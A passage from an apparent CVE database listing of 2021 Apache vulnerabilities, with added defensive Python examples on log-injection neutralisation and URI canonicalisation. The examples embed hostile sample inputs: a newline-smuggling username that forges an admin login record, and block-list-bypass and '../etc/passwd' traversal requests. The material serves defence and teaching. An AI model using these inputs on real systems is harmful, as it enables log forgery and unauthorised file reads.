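        text = text[:max_len] + '...[truncated]'
    return text


def format_login_record(user: str, ok: bool, neutralize: bool = True) -> str:
    """Build one log record; neutralize=False reproduces the vulnerable concatenation."""
    field = neutralize_for_log(user) if neutralize else user
    return 'login user="%s" result=%s' % (field, 'ok' if ok else 'denied')


def record_count(log_text: str) -> int:
    """How many records a consumer that splits on newlines would see."""
    return len([ln for ln in log_text.split('\n') if ln])


# Constructed attacker-supplied username (an assumption of this example): it
# ends the genuine record and appends a fake successful admin login.
FORGED_USERNAME = 'mallory" result=denied\nlogin user="admin" result=ok'

if __name__ == '__main__':
    for neutralize in (False, True):
        rec = format_login_record(FORGED_USERNAME, ok=False, neutralize=neutralize)
        label = 'neutralized' if neutralize else 'raw'
        print('%s -> %d record(s)\n%s\n' % (label, record_count(rec), rec))
```

Escaping rather than stripping keeps the evidence: an analyst reading the neutralised record can still see that someone tried to forge an entry.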

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-117,CWE-116,

Products Affected

Vendor Product Version
apache airavata_django_portal *
CVE-2021-43557 MEDIUM

The uri-block plugin in Apache APISIX before 2.10.2 uses $request_uri without verification. The $request_uri is the full original request URI without normalization. This makes it possible to construct a URI to bypass the block list on some occasions. For instance, when the block list contains "^/internal/", a URI like `//internal/` can be used to bypass it. Some other plugins also have the same issue. And it may affect the developer's custom plugin.
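This entry, CVE-2021-41773 and CVE-2021-42013 come down to the same mistake: an access decision or a path mapping made on a path that has not been canonicalised first. The following Python is an added example, not code from Apache httpd or APISIX. It shows a normalisation routine (percent-decode, then collapse '//' and resolve dot segments), a block-list check applied to the raw URI beside the same check on the normalised path, and an Alias-style mapper that refuses any request resolving outside its directory. The block rule, the alias prefix, the directory and the sample requests are assumptions chosen for the demonstration.

```python
import posixpath
import re
from urllib.parse import unquote


def normalize_path(raw_path: str, max_decode_rounds: int = 3) -> str:
    """Return the canonical form of a request path.

    Percent-decode first, repeatedly, so double encoding such as %252e is
    unwound; then drop empty and '.' segments and resolve '..', clamping at
    the root as RFC 3986 remove_dot_segments does. A trailing slash is kept
    so that a rule written as '^/internal/' still matches.
    """
    path = raw_path.split('?', 1)[0]          # the query string plays no part
    for _ in range(max_decode_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    segments = []
    for seg in path.split('/'):
        if seg in ('', '.'):                  # '//' and '/./' add nothing
            continue
        if seg == '..':
            if segments:
                segments.pop()
            continue
        segments.append(seg)
    result = '/' + '/'.join(segments)
    if path.endswith(('/', '/.', '/..')) and result != '/':
        result += '/'
    return result


# Hypothetical block list, in the style of the uri-block example above.
BLOCK_RULES = [r'^/internal/']


def blocked_on_raw(raw_path: str, rules=BLOCK_RULES) -> bool:
    """The flawed check: rules applied to the request URI exactly as sent."""
    return any(re.search(rule, raw_path) for rule in rules)


def blocked_on_normalized(raw_path: str, rules=BLOCK_RULES) -> bool:
    """The corrected check: the same rules applied to the canonical path."""
    return any(re.search(rule, normalize_path(raw_path)) for rule in rules)


def map_alias(raw_path: str, url_prefix: str, directory: str):
    """Map a URL below url_prefix onto directory, Alias-style.

    The URL is normalised before the prefix test, and the joined filesystem
    path is checked again afterwards, so a request can never resolve to a
    file outside the aliased directory. Returns None when it must be refused.
    """
    norm = normalize_path(raw_path)
    if not norm.startswith(url_prefix):
        return None
    target = posixpath.normpath(posixpath.join(directory, norm[len(url_prefix):]))
    root = directory.rstrip('/')
    if target != root and not target.startswith(root + '/'):
        return None                           # escaped the aliased directory
    return target


if __name__ == '__main__':
    # Constructed requests; none is taken from a real log.
    for req in ['/internal/', '//internal/', '/public/../internal/x', '/%2569nternal/']:
        print('%-26s raw=%-5s normalized=%s' % (req, blocked_on_raw(req), blocked_on_normalized(req)))
    for req in ['/cgi-bin/test.cgi', '/cgi-bin/../../../etc/passwd', '/cgi-bin/%2e%2e/%2e%2e/etc/passwd']:
        print('%-36s -> %s' % (req, map_alias(req, '/cgi-bin/', '/usr/lib/cgi-bin')))
```

The second check inside map_alias is the defence in depth the httpd advisories point at: even when normalisation is wrong, a final "is the resolved file still under the directory I meant" test, or on httpd the "require all denied" default on the filesystem root, turns a traversal into a 403 rather than a file read.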

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-77,

Products Affected

Vendor Product Version
apache apisix *
CVE-2021-43980

The simplified implementation of blocking reads and writes introduced in Tomcat 10 and back-ported to Tomcat 9.0.47 onwards exposed a long standing (but extremely hard to trigger) concurrency bug in Apache Tomcat 10.1.0 to 10.1.0-M12, 10.0.0-M1 to 10.0.18, 9.0.0-M1 to 9.0.60 and 8.5.0 to 8.5.77 that could cause client connections to share an Http11Processor instance resulting in responses, or part responses, to be received by the wrong client.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 3.7 LOW CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N 2.2 1.4

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 10.1.0
debian debian_linux 10.0
debian debian_linux 11.0
CVE-2021-43999 MEDIUM

Apache Guacamole 1.2.0 and 1.3.0 do not properly validate responses received from a SAML identity provider. If SAML support is enabled, this may allow a malicious user to assume the identity of another Guacamole user.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache guacamole 1.2.0
apache guacamole 1.3.0
CVE-2021-44040 MEDIUM

Improper Input Validation vulnerability in request line parsing of Apache Traffic Server allows an attacker to send invalid requests. This issue affects Apache Traffic Server 8.0.0 to 8.1.3 and 9.0.0 to 9.1.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache traffic_server *
debian debian_linux 11.0
CVE-2021-44140 MEDIUM

Remote attackers may delete arbitrary files in a system hosting a JSPWiki instance, versions up to 2.11.0.M8, by using a carefully crafted HTTP request on logout, given that those files are reachable to the user running the JSPWiki instance. Apache JSPWiki users should upgrade to 2.11.0 or later.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H 3.9 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-276,

Products Affected

Vendor Product Version
apache jspwiki *
CVE-2021-44145 MEDIUM

In the TransformXML processor of Apache NiFi before 1.15.1 an authenticated user could configure an XSLT file which, if it included malicious external entity calls, may reveal sensitive information.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache nifi *
CVE-2021-44224 MEDIUM

A crafted URI sent to httpd configured as a forward proxy (ProxyRequests on) can cause a crash (NULL pointer dereference) or, for configurations mixing forward and reverse proxy declarations, can allow for requests to be directed to a declared Unix Domain Socket endpoint (Server Side Request Forgery). This issue affects Apache HTTP Server 2.4.7 up to 2.4.51 (included).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.2 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H 3.9 4.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-476,

Products Affected

Vendor Product Version
apache http_server *
oracle communications_session_route_manager *
oracle communications_operations_monitor 4.4
oracle http_server 12.2.1.3.0
oracle http_server 12.2.1.4.0
apple macos *
oracle instantis_enterprisetrack 17.1
oracle communications_operations_monitor 4.3
oracle http_server -
oracle communications_operations_monitor 5.0
debian debian_linux 10.0
debian debian_linux 11.0
oracle communications_operations_monitor 4.0
fedoraproject fedora 35
oracle communications_session_report_manager *
fedoraproject fedora 34
tenable tenable.sc *
fedoraproject fedora 36
oracle instantis_enterprisetrack 17.2
oracle instantis_enterprisetrack 17.3
apple mac_os_x 10.15.7
oracle communications_element_manager *
CVE-2021-44228 HIGH

Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 10.0 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H 3.9 6.0

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,CWE-400,CWE-502,CWE-917,

Products Affected

Vendor Product Version
siemens comos *
siemens energy_engage 3.1
cisco paging_server 12.5(2)
cisco data_center_network_manager *
cisco virtual_topology_system 2.6.6
cisco smart_phy 3.1.5
intel sensor_solution_firmware_development_kit -
siemens gma-manager *
cisco fxos 7.0.0
cisco unified_contact_center_enterprise 12.0(1)
cisco nexus_dashboard *
siemens spectrum_power_7 *
cisco mobility_services_engine -
cisco video_surveillance_manager 7.14(2.26)
cisco unified_communications_manager 11.5(1)
cisco paging_server 9.0(2)
cisco identity_services_engine *
netapp snapcenter -
cisco sd-wan_vmanage 20.4
siemens nx *
siemens siveillance_command *
siemens siveillance_control_pro *
cisco dna_center *
cisco connected_analytics_for_network_deployment 7.3
intel datacenter_manager *
cisco crosswork_platform_infrastructure 4.1.0
cisco common_services_platform_collector 002.010(000.000)
cisco network_dashboard_fabric_controller 11.2(1)
cisco ucs_central_software 2.0
cisco wan_automation_engine 7.1.3
cisco packaged_contact_center_enterprise *
cisco firepower_threat_defense 7.1.0
cisco paging_server 8.5(1)
siemens solid_edge_harness_design 2020
cisco smart_phy 21.3
apple xcode *
cisco customer_experience_cloud_agent *
cisco emergency_responder 11.5
cisco smart_phy 3.2.1
cisco cloudcenter_cost_optimizer *
cisco identity_services_engine 002.006(000.156)
cisco unified_contact_center_express *
intel computer_vision_annotation_tool -
cisco advanced_malware_protection_virtual_private_cloud_appliance *
cisco unified_communications_manager 11.5(1)su3
apache log4j *
intel audio_development_kit -
siemens spectrum_power_4 *
cisco integrated_management_controller_supervisor 002.003(002.000)
cisco unified_intelligence_center *
siemens captial 2019.1
cisco wan_automation_engine 7.2.1
cisco optical_network_controller 1.1
netapp oncommand_insight -
cisco unified_communications_manager_im_&_presence_service 11.5(1)
cisco common_services_platform_collector 002.009(001.001)
siemens siguard_dsa *
intel data_center_manager *
cisco emergency_responder *
cisco cloudcenter_suite 5.4(1)
cisco connected_analytics_for_network_deployment 006.005.000.000
cisco crosswork_zero_touch_provisioning 3.0.0
cisco connected_mobile_experiences -
cisco crosswork_network_controller 3.0.0
siemens vesys 2021.1
cisco cloudcenter_suite 5.5.1
cisco unified_contact_center_express 12.6(2)
cisco nexus_insights *
cisco cloudcenter_suite 5.5(1)
cisco paging_server 14.0(1)
cisco crosswork_optimization_engine *
cisco evolved_programmable_network_manager 3.1
netapp ontap_tools -
cisco cloudcenter_suite 5.3(0)
cisco wan_automation_engine 7.4
siemens xpedition_package_integrator -
cisco paging_server 9.0(1)
cisco firepower_threat_defense 7.0.0
siemens capital *
siemens spectrum_power_7 2.30
siemens siveillance_vantage *
cisco packaged_contact_center_enterprise 11.6(1)
cisco crosswork_network_automation 3.0.0
cisco cyber_vision_sensor_management_extension 4.0.2
cisco unified_computing_system 006.008(001.000)
cisco wan_automation_engine 7.2.3
cisco cloudcenter_suite 4.10.0.15
sonicwall email_security *
cisco wan_automation_engine *
siemens sppa-t3000_ses3000_firmware *
cisco finesse 12.5(1)
cisco unified_contact_center_management_portal 12.6(1)
bentley synchro_4d *
cisco network_dashboard_fabric_controller 11.5(1)
siemens e-car_operation_center *
siemens opcenter_intelligence *
cisco dna_center 2.2.2.8
cisco unified_communications_manager_im_and_presence_service 11.5(1)
cisco ucs_director *
cisco cloud_connect *
cisco identity_services_engine 2.4.0
cisco network_dashboard_fabric_controller 11.0(1)
cisco connected_analytics_for_network_deployment 007.003.001.001
siemens 6bk1602-0aa52-0tp0_firmware *
cisco connected_analytics_for_network_deployment 007.003.000
cisco identity_services_engine 003.002(000.116)
cisco webex_meetings_server *
cisco common_services_platform_collector 002.009(001.000)
cisco cloudcenter_suite 5.5(0)
siemens sipass_integrated 2.85
cisco ucs_central_software 2.0(1c)
cisco network_assurance_engine 6.0(2.1912)
cisco network_assurance_engine *
siemens desigo_cc_advanced_reports 3.0
siemens teamcenter *
cisco crosswork_data_gateway *
cisco unified_sip_proxy 010.000(001)
cisco sd-wan_vmanage *
cisco firepower_threat_defense 6.5.0
netapp cloud_insights -
netapp solidfire_&_hci_storage_node -
cisco enterprise_chat_and_email *
cisco network_dashboard_fabric_controller 11.5(2)
siemens energyip_prepay 3.7
cisco intersight_virtual_appliance *
cisco unified_communications_manager 11.5(1.21900.40)
siemens sentron_powermanager 4.2
intel genomics_kernel_library -
debian debian_linux 10.0
siemens energyip 8.5
cisco crosswork_platform_infrastructure *
cisco video_surveillance_manager 7.14(4.018)
cisco network_services_orchestrator *
cisco unified_contact_center_enterprise 11.6(2)
cisco unity_connection 11.5(1.10000.6)
cisco unified_contact_center_express 12.6(1)
cisco cloudcenter_suite_admin *
cisco emergency_responder 11.5(4.65000.14)
cisco enterprise_chat_and_email 12.0(1)
cisco unified_customer_voice_portal 11.6(1)
cisco evolved_programmable_network_manager 3.0
snowsoftware snow_commander *
cisco fxos 7.1.0
cisco broadworks *
cisco unified_communications_manager 11.5(1.18119.2)
siemens desigo_cc_advanced_reports 4.2
cisco unified_contact_center_express 12.5(1)
cisco cloudcenter_suite 5.5.0
cisco contact_center_domain_manager *
cisco unified_communications_manager 11.5(1.18900.97)
cisco unified_contact_center_enterprise 12.5(1)
cisco cyber_vision 4.0.2
cisco connected_analytics_for_network_deployment 006.004.000.003
cisco connected_analytics_for_network_deployment 007.000.001
siemens siguard_dsa 4.4
siemens vesys *
cisco enterprise_chat_and_email 12.6(1)
cisco firepower_threat_defense 6.4.0
cisco cloudcenter_suite 5.3.0
cisco crosswork_network_automation -
siemens siveillance_identity 1.6
siemens energyip 8.6
cisco identity_services_engine 002.004(000.914)
cisco video_surveillance_operations_manager *
cisco network_services_orchestrator -
cisco ucs_central_software 2.0(1e)
cisco unified_customer_voice_portal 11.6
cisco connected_analytics_for_network_deployment 007.001.000
cisco network_dashboard_fabric_controller 11.5(3)
siemens navigator *
cisco paging_server 8.3(1)
cisco unified_contact_center_enterprise 12.6(1)
cisco unified_workforce_optimization *
cisco webex_meetings_server 3.0
siemens desigo_cc_advanced_reports 4.1
intel system_studio -
cisco network_insights_for_data_center 6.0(2.1914)
cisco firepower_threat_defense 6.6.0
cisco prime_service_catalog *
cisco crosswork_network_automation 4.1.0
cisco ucs_central_software 2.0(1k)
cisco unified_customer_voice_portal 12.5
siemens siguard_dsa 4.3
siemens xpedition_enterprise -
cisco connected_analytics_for_network_deployment 008.000.000.000.004
cisco wan_automation_engine 7.3
siemens energyip_prepay *
cisco fxos 6.4.0
cisco dna_spaces_connector -
siemens siguard_dsa 4.2
cisco unity_connection *
cisco sd-wan_vmanage 20.8
netapp brocade_san_navigator -
cisco emergency_responder 11.5(4.66000.14)
siemens head-end_system_universal_device_integration_system *
cisco intersight_virtual_appliance 1.0.9-343
siemens captial *
cisco unified_customer_voice_portal *
cisco fxos 6.3.0
cisco connected_analytics_for_network_deployment 007.002.000
cisco workload_optimization_manager *
cisco smart_phy 3.1.3
cisco cloudcenter *
cisco paging_server *
cisco dna_spaces -
cisco cyber_vision_sensor_management_extension *
cisco evolved_programmable_network_manager 4.0
cisco connected_analytics_for_network_deployment 008.000.000
cisco sd-wan_vmanage 20.6.1
cisco unified_customer_voice_portal 12.0
cisco integrated_management_controller_supervisor 2.3.2.0
cisco virtualized_infrastructure_manager *
cisco data_center_network_manager 11.3(1)
siemens 6bk1602-0aa42-0tp0_firmware *
cisco crosswork_zero_touch_provisioning *
cisco ucs_central_software 2.0(1d)
cisco unified_communications_manager 11.5(1.22900.28)
cisco ucs_central_software 2.0(1a)
cisco firepower_threat_defense 6.2.3
cisco common_services_platform_collector 002.009(000.002)
cisco common_services_platform_collector 002.009(001.002)
cisco connected_analytics_for_network_deployment 007.003.003
cisco sd-wan_vmanage 20.7
siemens desigo_cc_info_center 5.0
cisco ucs_central_software 2.0(1l)
cisco evolved_programmable_network_manager 5.1
cisco crosswork_network_automation 2.0.0
cisco enterprise_chat_and_email 12.5(1)
cisco virtualized_voice_browser *
intel oneapi_sample_browser -
cisco unified_contact_center_enterprise *
cisco evolved_programmable_network_manager 4.1
cisco ucs_central *
cisco unified_customer_voice_portal 12.5(1)
cisco video_surveillance_manager 7.14(3.025)
debian debian_linux 11.0
cisco identity_services_engine 003.001(000.518)
cisco prime_service_catalog 12.1
cisco unified_customer_voice_portal 12.6(1)
cisco unified_intelligence_center 12.6(2)
siemens 6bk1602-0aa12-0tp0_firmware *
siemens energyip_prepay 3.8
cisco cloudcenter_suite 4.10(0.15)
siemens desigo_cc_advanced_reports 5.0
cisco contact_center_management_portal *
siemens logo!_soft_comfort *
cisco firepower_threat_defense 6.7.0
cisco unified_communications_manager_im_&_presence_service 11.5(1.22900.6)
siemens siveillance_viewpoint *
cisco fog_director -
cisco unified_sip_proxy 010.000(000)
bentley synchro *
cisco network_dashboard_fabric_controller 11.1(1)
siemens energyip 9.0
cisco fxos 6.2.3
cisco sd-wan_vmanage 20.6
cisco wan_automation_engine 7.2.2
siemens industrial_edge_management *
intel system_debugger -
cisco automated_subsea_tuning *
cisco unified_sip_proxy 010.002(000)
cisco unified_sip_proxy *
cisco cx_cloud_agent 001.012
apache log4j 2.0
cisco unified_workforce_optimization 11.5(1)
cisco common_services_platform_collector 002.009(000.001)
cisco business_process_automation *
cisco video_surveillance_manager 7.14(1.26)
cisco fxos 6.7.0
cisco finesse *
siemens mendix *
siemens sipass_integrated 2.80
cisco unity_connection 11.5
netapp cloud_secure_agent -
siemens industrial_edge_management_hub *
siemens desigo_cc_advanced_reports 4.0
debian debian_linux 9.0
siemens solid_edge_harness_design *
cisco smart_phy *
cisco virtual_topology_system *
intel secure_device_onboard -
cisco identity_services_engine 002.007(000.356)
cisco network_dashboard_fabric_controller 11.4(1)
cisco ucs_central_software 2.0(1h)
siemens 6bk1602-0aa32-0tp0_firmware *
cisco sd-wan_vmanage 20.3
cisco cloudcenter_workload_manager *
cisco dna_spaces:_connector *
siemens energyip 8.7
siemens vesys 2019.1
siemens capital 2019.1
cisco firepower_threat_defense 6.3.0
cisco unified_communications_manager *
cisco ucs_central_software 2.0(1b)
siemens spectrum_power_4 4.70
snowsoftware vm_access_proxy *
cisco wan_automation_engine 7.5
cisco connected_analytics_for_network_deployment 006.005.000.
siemens siveillance_identity 1.5
cisco cloudcenter_suite 5.4.1
cisco iot_operations_dashboard -
siemens 6bk1602-0aa22-0tp0_firmware *
cisco unified_communications_manager 11.5(1.17900.52)
cisco unified_contact_center_enterprise 12.6(2)
cisco unified_communications_manager_im_and_presence_service *
fedoraproject fedora 35
siemens desigo_cc_info_center 5.1
siemens desigo_cc_advanced_reports 5.1
fedoraproject fedora 34
siemens sentron_powermanager 4.1
cisco network_dashboard_fabric_controller 11.3(1)
netapp solidfire_enterprise_sds -
cisco common_services_platform_collector 002.009(000.000)
siemens mindsphere *
percussion rhythmyx *
cisco integrated_management_controller_supervisor *
siemens solid_edge_cam_pro *
cisco ucs_central_software 2.0(1g)
cisco evolved_programmable_network_manager *
cisco automated_subsea_tuning 02.01.00
cisco identity_services_engine 003.000(000.458)
cisco wan_automation_engine 7.6
cisco finesse 12.6(1)
siemens vesys 2020.1
cisco smart_phy 3.1.4
cisco common_services_platform_collector *
cisco crosswork_network_automation 4.1.1
cisco unified_intelligence_center 12.6(1)
cisco unified_customer_voice_portal 12.0(1)
netapp active_iq_unified_manager -
cisco broadworks -
cisco ucs_central_software 2.0(1f)
siemens operation_scheduler *
cisco webex_meetings_server 4.0
cisco fxos 6.6.0
cisco optical_network_controller *
netapp cloud_manager -
cisco paging_server 9.1(1)
cisco paging_server 8.4(1)
cisco smart_phy 3.1.2
cisco crosswork_optimization_engine 3.0.0
cisco crosswork_network_controller *
cisco fxos 6.5.0
cisco sd-wan_vmanage 20.5
cisco unified_sip_proxy 010.002(001)
cisco crosswork_data_gateway 3.0.0
cisco evolved_programmable_network_manager 5.0
CVE-2021-44451 MEDIUM

Apache Superset up to and including 1.3.2 allowed authenticated users to obtain the passwords of registered database connections. This information could be accessed in a non-trivial way. Users should upgrade to Apache Superset 1.4.0 or higher.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-522,

Products Affected

Vendor Product Version
apache superset *
CVE-2021-44521 HIGH

When running Apache Cassandra with the following configuration:

enable_user_defined_functions: true
enable_scripted_user_defined_functions: true
enable_user_defined_functions_threads: false

it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H 2.3 6.0

CVSS 2.0

Severity: HIGH

Problem Type: CWE-94,CWE-732,

Products Affected

Vendor Product Version
apache cassandra *
CVE-2021-44548 MEDIUM

An Improper Input Validation vulnerability in DataImportHandler of Apache Solr allows an attacker to provide a Windows UNC path resulting in an SMB network call being made from the Solr host to another host on the network. If the attacker has wider access to the network, this may lead to SMB attacks, which may result in:
* The exfiltration of sensitive data such as OS user hashes (NTLM/LM hashes),
* In case of misconfigured systems, SMB Relay Attacks which can lead to user impersonation on SMB Shares or, in a worse-case scenario, Remote Code Execution.
This issue affects all Apache Solr versions prior to 8.11.1. This issue only affects Windows.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,CWE-40,CWE-22,

Products Affected

Vendor Product Version
apache solr *
CVE-2021-44549 MEDIUM

Apache Sling Commons Messaging Mail provides a simple layer on top of JavaMail/Jakarta Mail for OSGi to send mails via SMTPS. To reduce the risk of "man in the middle" attacks, additional server identity checks must be performed when accessing mail servers. For compatibility reasons these additional checks are disabled by default in JavaMail/Jakarta Mail. The SimpleMailService in Apache Sling Commons Messaging Mail 1.0 lacks an option to enable these checks for the shared mail session. A user could enable these checks nevertheless by accessing the session via the message created by SimpleMessageBuilder and setting the property mail.smtps.ssl.checkserveridentity to true. Apache Sling Commons Messaging Mail 2.0 adds support for enabling server identity checks, and these checks are enabled by default. References: https://javaee.github.io/javamail/docs/SSLNOTES.txt, https://javaee.github.io/javamail/docs/api/com/sun/mail/smtp/package-summary.html, https://github.com/eclipse-ee4j/mail/issues/429

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.4 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N 2.2 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-295,

Products Affected

Vendor Product Version
apache sling_commons_messaging_mail 1.0.0
CVE-2021-44759 MEDIUM

Improper Authentication vulnerability in TLS origin validation of Apache Traffic Server allows an attacker to create a man in the middle attack. This issue affects Apache Traffic Server 8.0.0 to 8.1.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.1 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H 2.2 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache traffic_server *
debian debian_linux 11.0
CVE-2021-44790 HIGH

A carefully crafted request body can cause a buffer overflow in the mod_lua multipart parser (r:parsebody() called from Lua scripts). The Apache httpd team is not aware of an exploit for the vulnerability, though it might be possible to craft one. This issue affects Apache HTTP Server 2.4.51 and earlier.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-787,

Products Affected

Vendor Product Version
apache http_server *
oracle communications_session_route_manager *
oracle communications_operations_monitor 4.4
oracle http_server 12.2.1.3.0
oracle http_server 12.2.1.4.0
apple macos *
oracle instantis_enterprisetrack 17.1
oracle communications_operations_monitor 4.3
oracle communications_operations_monitor 5.0
debian debian_linux 10.0
debian debian_linux 11.0
fedoraproject fedora 35
oracle communications_session_report_manager *
netapp cloud_backup -
fedoraproject fedora 34
tenable tenable.sc *
oracle zfs_storage_appliance_kit 8.8
fedoraproject fedora 36
oracle instantis_enterprisetrack 17.2
oracle instantis_enterprisetrack 17.3
apple mac_os_x 10.15.7
oracle communications_element_manager *
CVE-2021-44791 MEDIUM

In Apache Druid 0.22.1 and earlier, certain specially-crafted links result in unescaped URL parameters being sent back in HTML responses. This makes it possible to execute reflected XSS attacks.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache druid *
CVE-2021-44832 HIGH

Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack when a configuration uses a JDBC Appender with a JNDI LDAP data source URI when an attacker has control of the target LDAP server. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.6 MEDIUM CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H 0.7 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,CWE-74,

Products Affected

Vendor Product Version
oracle communications_brm_-_elastic_charging_engine *
oracle communications_brm_-_elastic_charging_engine 12.0.0.5.0
oracle policy_automation_for_mobile_devices *
oracle retail_xstore_point_of_service 21.0.1
apache log4j *
oracle communications_diameter_signaling_router *
fedoraproject fedora 35
oracle primavera_gateway *
oracle primavera_p6_enterprise_project_portfolio_management *
oracle retail_xstore_point_of_service 20.0.1
oracle health_sciences_data_management_workbench 2.5.2.1
fedoraproject fedora 34
oracle communications_interactive_session_recorder 6.3
apache log4j 2.0
oracle policy_automation *
oracle retail_xstore_point_of_service 18.0.3
oracle primavera_gateway 21.12.0
oracle weblogic_server 12.2.1.4.0
oracle product_lifecycle_analytics 3.6.1
oracle communications_offline_mediation_controller *
oracle weblogic_server 12.2.1.3.0
oracle primavera_unifier 20.12
oracle siebel_ui_framework *
oracle primavera_unifier 21.12
debian debian_linux 9.0
oracle retail_assortment_planning 16.0.3
oracle primavera_unifier 18.8
oracle retail_xstore_point_of_service 17.0.4
oracle communications_offline_mediation_controller 12.0.0.5.0
oracle health_sciences_data_management_workbench 3.1.0.3
oracle retail_xstore_point_of_service 19.0.2
oracle retail_order_broker 19.1
oracle siebel_ui_framework 21.12
oracle primavera_unifier 19.12
oracle health_sciences_data_management_workbench 3.0.0.0
oracle retail_fiscal_management 14.2
oracle primavera_p6_enterprise_project_portfolio_management 21.12.0.0
oracle communications_interactive_session_recorder 6.4
oracle weblogic_server 14.1.1.0.0
cisco cloudcenter 4.10.0.16
oracle retail_order_broker 18.0
oracle flexcube_private_banking 12.1.0
CVE-2021-45029 HIGH

Groovy code injection and SpEL injection in Apache ShenYu lead to remote code execution. This issue affected Apache ShenYu 2.4.0 and 2.4.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-94,

Products Affected

Vendor Product Version
apache shenyu 2.4.0
apache shenyu 2.4.1
CVE-2021-45046 MEDIUM

